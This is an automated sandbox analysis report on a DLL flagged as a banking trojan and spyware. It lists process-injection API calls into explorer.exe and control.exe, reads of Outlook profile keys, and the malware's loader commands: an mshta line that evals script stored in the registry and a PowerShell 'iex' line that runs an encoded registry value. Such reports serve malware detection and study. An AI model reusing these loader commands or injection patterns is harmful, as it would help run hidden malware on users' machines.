Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 0_2_00439AF0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 0_2_00439BA0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02C914E8 NtCreateSection,memset, 0_2_02C914E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02C9183B NtMapViewOfSection, 0_2_02C9183B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02C922C5 NtQueryVirtualMemory, 0_2_02C922C5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F372D8 NtMapViewOfSection, 0_2_02F372D8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F31371 GetProcAddress,NtCreateSection,memset, 0_2_02F31371
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F37507 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_02F37507
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F3B2F1 NtQueryVirtualMemory, 0_2_02F3B2F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0044C8CC NtdllDefWindowProc_A,GetCapture, 1_2_0044C8CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0042863C NtdllDefWindowProc_A, 1_2_0042863C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0044281C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 1_2_0044281C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00439348 NtdllDefWindowProc_A, 1_2_00439348
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 1_2_00439AF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 1_2_00439BA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_045422C5 NtQueryVirtualMemory, 1_2_045422C5
Source: C:\Windows\explorer.exe Code function: 37_2_04DA14D0 NtQueryInformationProcess, 37_2_04DA14D0
Source: C:\Windows\explorer.exe Code function: 37_2_04DC20B4 NtQueryInformationProcess, 37_2_04DC20B4
Source: C:\Windows\explorer.exe Code function: 37_2_04DC4064 NtMapViewOfSection, 37_2_04DC4064
Source: C:\Windows\explorer.exe Code function: 37_2_04DA7008 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 37_2_04DA7008
Source: C:\Windows\explorer.exe Code function: 37_2_04DA5DF4 RtlAllocateHeap,NtCreateSection, 37_2_04DA5DF4
Source: C:\Windows\explorer.exe Code function: 37_2_04DC7278 NtWriteVirtualMemory, 37_2_04DC7278
Source: C:\Windows\explorer.exe Code function: 37_2_04DA527C NtAllocateVirtualMemory, 37_2_04DA527C
Source: C:\Windows\explorer.exe Code function: 37_2_04DB6A74 NtQuerySystemInformation, 37_2_04DB6A74
Source: C:\Windows\explorer.exe Code function: 37_2_04DB2FD0 NtQueryInformationProcess, 37_2_04DB2FD0
Source: C:\Windows\explorer.exe Code function: 37_2_04DBFF54 NtReadVirtualMemory, 37_2_04DBFF54
Source: C:\Windows\explorer.exe Code function: 37_2_04DAEF1C NtSetContextThread,NtUnmapViewOfSection,NtClose, 37_2_04DAEF1C
Source: C:\Windows\explorer.exe Code function: 37_2_04DB4B24 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification, 37_2_04DB4B24
Source: C:\Windows\explorer.exe Code function: 37_2_04DDA002 NtProtectVirtualMemory,NtProtectVirtualMemory, 37_2_04DDA002
Source: C:\Windows\System32\control.exe Code function: 38_2_00117008 NtQueryInformationToken,NtQueryInformationToken,NtClose, 38_2_00117008
Source: C:\Windows\System32\control.exe Code function: 38_2_00134064 NtMapViewOfSection, 38_2_00134064
Source: C:\Windows\System32\control.exe Code function: 38_2_001320B4 NtQueryInformationProcess, 38_2_001320B4
Source: C:\Windows\System32\control.exe Code function: 38_2_001114D0 NtQueryInformationProcess, 38_2_001114D0
Source: C:\Windows\System32\control.exe Code function: 38_2_00115DF4 NtCreateSection, 38_2_00115DF4
Source: C:\Windows\System32\control.exe Code function: 38_2_00137278 NtWriteVirtualMemory, 38_2_00137278
Source: C:\Windows\System32\control.exe Code function: 38_2_0011527C NtAllocateVirtualMemory, 38_2_0011527C
Source: C:\Windows\System32\control.exe Code function: 38_2_0011EF1C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 38_2_0011EF1C
Source: C:\Windows\System32\control.exe Code function: 38_2_00124B24 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 38_2_00124B24
Source: C:\Windows\System32\control.exe Code function: 38_2_0012FF54 NtReadVirtualMemory, 38_2_0012FF54
Source: C:\Windows\System32\control.exe Code function: 38_2_0014A002 NtProtectVirtualMemory,NtProtectVirtualMemory, 38_2_0014A002
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044281C 0_2_0044281C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00433840 0_2_00433840
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02C920A4 0_2_02C920A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F323FC 0_2_02F323FC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F3936B 0_2_02F3936B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0044281C 1_2_0044281C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00433840 1_2_00433840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_045420A4 1_2_045420A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_04521618 1_2_04521618
Source: C:\Windows\explorer.exe Code function: 37_2_04DC0CDC 37_2_04DC0CDC
Source: C:\Windows\explorer.exe Code function: 37_2_04DBA0C4 37_2_04DBA0C4
Source: C:\Windows\explorer.exe Code function: 37_2_04DA58FC 37_2_04DA58FC
Source: C:\Windows\explorer.exe Code function: 37_2_04DB2080 37_2_04DB2080
Source: C:\Windows\explorer.exe Code function: 37_2_04DAA8B8 37_2_04DAA8B8
Source: C:\Windows\explorer.exe Code function: 37_2_04DB059C 37_2_04DB059C
Source: C:\Windows\explorer.exe Code function: 37_2_04DBE178 37_2_04DBE178
Source: C:\Windows\explorer.exe Code function: 37_2_04DB3520 37_2_04DB3520
Source: C:\Windows\explorer.exe Code function: 37_2_04DC36F4 37_2_04DC36F4
Source: C:\Windows\explorer.exe Code function: 37_2_04DBAE94 37_2_04DBAE94
Source: C:\Windows\explorer.exe Code function: 37_2_04DA16B4 37_2_04DA16B4
Source: C:\Windows\explorer.exe Code function: 37_2_04DA7A0C 37_2_04DA7A0C
Source: C:\Windows\explorer.exe Code function: 37_2_04DB537C 37_2_04DB537C
Source: C:\Windows\explorer.exe Code function: 37_2_04DAEF1C 37_2_04DAEF1C
Source: C:\Windows\explorer.exe Code function: 37_2_04DC40F8 37_2_04DC40F8
Source: C:\Windows\explorer.exe Code function: 37_2_04DA3088 37_2_04DA3088
Source: C:\Windows\explorer.exe Code function: 37_2_04DBE87C 37_2_04DBE87C
Source: C:\Windows\explorer.exe Code function: 37_2_04DC5010 37_2_04DC5010
Source: C:\Windows\explorer.exe Code function: 37_2_04DA4828 37_2_04DA4828
Source: C:\Windows\explorer.exe Code function: 37_2_04DC2994 37_2_04DC2994
Source: C:\Windows\explorer.exe Code function: 37_2_04DAD590 37_2_04DAD590
Source: C:\Windows\explorer.exe Code function: 37_2_04DB154C 37_2_04DB154C
Source: C:\Windows\explorer.exe Code function: 37_2_04DAB170 37_2_04DAB170
Source: C:\Windows\explorer.exe Code function: 37_2_04DA6168 37_2_04DA6168
Source: C:\Windows\explorer.exe Code function: 37_2_04DADD18 37_2_04DADD18
Source: C:\Windows\explorer.exe Code function: 37_2_04DAAD03 37_2_04DAAD03
Source: C:\Windows\explorer.exe Code function: 37_2_04DB8504 37_2_04DB8504
Source: C:\Windows\explorer.exe Code function: 37_2_04DB0134 37_2_04DB0134
Source: C:\Windows\explorer.exe Code function: 37_2_04DA66D0 37_2_04DA66D0
Source: C:\Windows\explorer.exe Code function: 37_2_04DA1AD0 37_2_04DA1AD0
Source: C:\Windows\explorer.exe Code function: 37_2_04DB6E88 37_2_04DB6E88
Source: C:\Windows\explorer.exe Code function: 37_2_04DC1A30 37_2_04DC1A30
Source: C:\Windows\explorer.exe Code function: 37_2_04DABF6C 37_2_04DABF6C
Source: C:\Windows\explorer.exe Code function: 37_2_04DAB730 37_2_04DAB730
Source: C:\Windows\explorer.exe Code function: 37_2_04DB3F2C 37_2_04DB3F2C
Source: C:\Windows\explorer.exe Code function: 37_2_04DACF24 37_2_04DACF24
Source: C:\Windows\System32\control.exe Code function: 38_2_00130CDC 38_2_00130CDC
Source: C:\Windows\System32\control.exe Code function: 38_2_0012059C 38_2_0012059C
Source: C:\Windows\System32\control.exe Code function: 38_2_0011EF1C 38_2_0011EF1C
Source: C:\Windows\System32\control.exe Code function: 38_2_00135010 38_2_00135010
Source: C:\Windows\System32\control.exe Code function: 38_2_00114828 38_2_00114828
Source: C:\Windows\System32\control.exe Code function: 38_2_0012E87C 38_2_0012E87C
Source: C:\Windows\System32\control.exe Code function: 38_2_00122080 38_2_00122080
Source: C:\Windows\System32\control.exe Code function: 38_2_00113088 38_2_00113088
Source: C:\Windows\System32\control.exe Code function: 38_2_0011A8B8 38_2_0011A8B8
Source: C:\Windows\System32\control.exe Code function: 38_2_0012A0C4 38_2_0012A0C4
Source: C:\Windows\System32\control.exe Code function: 38_2_001340F8 38_2_001340F8
Source: C:\Windows\System32\control.exe Code function: 38_2_001158FC 38_2_001158FC
Source: C:\Windows\System32\control.exe Code function: 38_2_0011DD18 38_2_0011DD18
Source: C:\Windows\System32\control.exe Code function: 38_2_0011AD03 38_2_0011AD03
Source: C:\Windows\System32\control.exe Code function: 38_2_00128504 38_2_00128504
Source: C:\Windows\System32\control.exe Code function: 38_2_00120134 38_2_00120134
Source: C:\Windows\System32\control.exe Code function: 38_2_00123520 38_2_00123520
Source: C:\Windows\System32\control.exe Code function: 38_2_0012154C 38_2_0012154C
Source: C:\Windows\System32\control.exe Code function: 38_2_0011B170 38_2_0011B170
Source: C:\Windows\System32\control.exe Code function: 38_2_0012E178 38_2_0012E178
Source: C:\Windows\System32\control.exe Code function: 38_2_00116168 38_2_00116168
Source: C:\Windows\System32\control.exe Code function: 38_2_0011D590 38_2_0011D590
Source: C:\Windows\System32\control.exe Code function: 38_2_00132994 38_2_00132994
Source: C:\Windows\System32\control.exe Code function: 38_2_00117A0C 38_2_00117A0C
Source: C:\Windows\System32\control.exe Code function: 38_2_00131A30 38_2_00131A30
Source: C:\Windows\System32\control.exe Code function: 38_2_0012AE94 38_2_0012AE94
Source: C:\Windows\System32\control.exe Code function: 38_2_00126E88 38_2_00126E88
Source: C:\Windows\System32\control.exe Code function: 38_2_001116B4 38_2_001116B4
Source: C:\Windows\System32\control.exe Code function: 38_2_00111AD0 38_2_00111AD0
Source: C:\Windows\System32\control.exe Code function: 38_2_001166D0 38_2_001166D0
Source: C:\Windows\System32\control.exe Code function: 38_2_001336F4 38_2_001336F4
Source: C:\Windows\System32\control.exe Code function: 38_2_0011B730 38_2_0011B730
Source: C:\Windows\System32\control.exe Code function: 38_2_0011CF24 38_2_0011CF24
Source: C:\Windows\System32\control.exe Code function: 38_2_00123F2C 38_2_00123F2C
Source: C:\Windows\System32\control.exe Code function: 38_2_0012537C 38_2_0012537C
Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 00403EBC appears 75 times
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 00406224 appears 61 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00403EBC appears 77 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00406224 appears 61 times
One or more processes crash
Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 756
PE file contains strange resources
Source: yytr.dll Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
PE file does not import any functions
Source: maejgtwh.dll.35.dr Static PE information: No import functions for PE file found
Source: qxfma03s.dll.33.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses 32bit PE files
Source: yytr.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@47/76@10/3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00420AE8 GetLastError,FormatMessageA, 0_2_00420AE8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_004085C6 GetDiskFreeSpaceA, 0_2_004085C6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F382EB CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 0_2_02F382EB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00416AE4 FindResourceA, 0_2_00416AE4
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{0A3DC979-6AC5-11EB-90EB-ECF4BBEA1588}.dat Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{305FBD52-CFE8-E23F-D964-73361DD857CA}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{7C7FA6C6-ABD4-0EE2-1570-0F2219A4B376}
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4576
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{8C972E34-7B6D-9E84-6580-DFB269B48306}
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B01.tmp Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1
Source: yytr.dll Virustotal: Detection: 43%
Source: yytr.dll ReversingLabs: Detection: 39%
Source: loaddll32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\yytr.dll'
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 756
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: powrprof.pdbG source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdb source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: version.pdb{ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb} source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: combase.pdbQ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.845354069.000001CB4A4D0000.00000002.00000001.sdmp, csc.exe, 00000023.00000002.855076730.000002D3EE650000.00000002.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdbM source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
